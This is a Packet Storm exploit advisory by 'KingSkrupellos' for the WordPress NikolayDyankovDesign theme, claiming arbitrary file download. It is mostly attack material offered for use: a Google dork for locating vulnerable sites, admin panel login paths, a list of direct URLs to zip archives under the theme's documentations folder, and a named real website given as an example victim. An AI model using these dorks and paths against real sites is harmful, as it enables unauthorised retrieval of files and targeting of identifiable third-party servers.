WordPress NikolayDyankovDesign 2.0 Arbitrary File Disclosure

2018-12-10T00:00:00
ID PACKETSTORM:150700
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-10T00:00:00

Description

                                        
                                            `#################################################################################################  
  
# Exploit Title : WordPress NikolayDyankovDesign Themes 2.0 Arbitrary File  
Download  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 08/12/2018  
# Vendor Homepage : pinterest.com/nikolaydyankov/ ~ nikolaydyankovdesign.com  
~ semsoft.ca  
# Software Download Link : N/A  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.0 and 2.0  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/themes/nikolaydyankovdesign/''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/demox/admin/  
/wp-log  
  
# Exploit :  
  
/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip  
  
/wp-content/themes/nikolaydyankovdesign/documentations/flipper-for-wordpress-2-0.zip  
  
/wp-content/themes/nikolaydyankovdesign/documentations/flipper.zip  
  
/wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map-for-wordpress.zip  
  
/wp-content/themes/nikolaydyankovdesign/documentations/rockstar-map.zip  
  
/wp-content/themes/nikolaydyankovdesign/documentations/timeliner-for-wordpress.zip  
  
/wp-content/themes/nikolaydyankovdesign/documentations/timelinexml.zip  
  
/wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline-for-wordpress.zip  
  
/wp-content/themes/nikolaydyankovdesign/documentations/touch-timeline.zip  
  
#################################################################################################  
  
# Example Vulnerable Site =>  
  
[+]  
photobook.com.tr/demox/siparis/wp-content/themes/nikolaydyankovdesign/documentations/dynamic-grid-the-engine.zip  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`